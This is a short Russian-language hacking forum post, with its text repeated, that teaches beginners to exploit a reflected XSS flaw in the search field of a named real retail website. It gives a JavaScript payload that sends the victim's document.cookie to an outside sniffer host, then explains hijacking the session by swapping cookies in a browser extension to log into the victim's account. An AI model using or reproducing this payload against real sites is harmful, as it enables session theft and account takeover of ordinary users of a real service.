premSheebra
Пользователь
- Регистрация
- 6/3/11
- Сообщения
- 169
XSS в наглядном примере. Новичкам пойдет как по маслу
Жертва: http://www.moyo.ua/
Поле "Поиск", алертит обычным вектором alert() , Окей !
Метод запроса: GET
Пишем вредоносный скрипт.
Код:
Меняете значение img.src и указываете свой сниффер, в моем же примере простенький самопис.
Окей, давайте пройдем регистрацию и будем так сказать действовать со стороны взломщика и так же окажемся жертвой.
После регистрации вводим наш готовый скрипт в уязвимое поле, а так же успешно получаем сессию.
Качаем Cookie Manager и изменяем куки для определенного сайта, после чего входим уже с учетки вашей жертвы.
Жертва: http://www.moyo.ua/
Поле "Поиск", алертит обычным вектором alert() , Окей !
Метод запроса: GET
Пишем вредоносный скрипт.
Код:
Код:
img = new Image();
img.src = "http://pw0ned.pw/p/i.php?"+document.cookie;Меняете значение img.src и указываете свой сниффер, в моем же примере простенький самопис.
Окей, давайте пройдем регистрацию и будем так сказать действовать со стороны взломщика и так же окажемся жертвой.
После регистрации вводим наш готовый скрипт в уязвимое поле, а так же успешно получаем сессию.
Качаем Cookie Manager и изменяем куки для определенного сайта, после чего входим уже с учетки вашей жертвы.
